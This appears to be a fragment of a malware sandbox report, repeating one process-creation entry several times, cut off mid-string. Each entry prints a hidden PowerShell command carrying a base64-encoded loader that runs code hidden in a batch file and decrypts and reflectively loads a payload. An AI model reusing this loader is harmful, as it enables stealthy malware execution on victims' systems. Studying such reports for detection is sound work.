tSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjc